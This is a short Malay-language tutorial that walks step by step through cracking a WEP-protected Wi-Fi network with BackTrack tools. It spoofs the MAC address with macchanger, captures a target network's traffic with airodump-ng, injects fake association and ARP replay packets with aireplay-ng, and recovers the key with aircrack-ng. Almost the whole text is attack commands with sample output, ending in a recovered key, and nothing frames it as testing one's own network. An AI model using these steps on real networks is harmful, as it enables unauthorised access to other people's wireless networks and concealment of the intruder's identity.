Crack WEP key menggunakan Backtrack
# Buka terminal pertama
# Lihat wireless devise
airmon-ng
Interface Chipset Driver
wlan0 RTL8187 r8187
# Hentikan monitors wireless devise
airmon-ng stop wlan0
Interface Chipset Driver
wlan0 RTL8187 r8187 (monitor mode disabled)
# Tukar wireless devise kepada mode untuk mengubah settings
ifconfig wlan0 down
# Tukar MAC address
macchanger –mac 00:11:22:33:44:55 wlan0
Current MAC: 00:13:ce:33:96:29 (unknown)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
# Start wireless devise
airmon-ng start wlan0
Interface Chipset Driver
wlan0 RTL8187 r8187 (monitor mode enable)
# Mengarahkan wireless devise untuk monitoring semua access points
airodump-ng wlan0
BSSID #Data CH ENC ESSID
00:11:95:19:4D:94 56 6 WEP aztec
# Kutip data dari mangsa
airodump-ng –c 6 –w aztec –bssid 00:11:95:19:4D:94 wlan0
# Buka terminal kedua
# Dapatkan association
aireplay-ng -1 0 –a 00:11:95:19:4D:94 –h 00:11:22:33:44:55 –e aztec wlan0
# ARP work
aireplay-ng -3 –b 00:11:95:19:4D:94 –h 00:11:22:33:44:55 wlan0
# Buka terminal ketiga
# Crack (lihat shell pertama, tunggu data >10000)
aircrack-ng –n 64 –b 00:11:95:19:4D:94 aztec-01.cap
KEY FOUNDS! [09:12:34:56:78]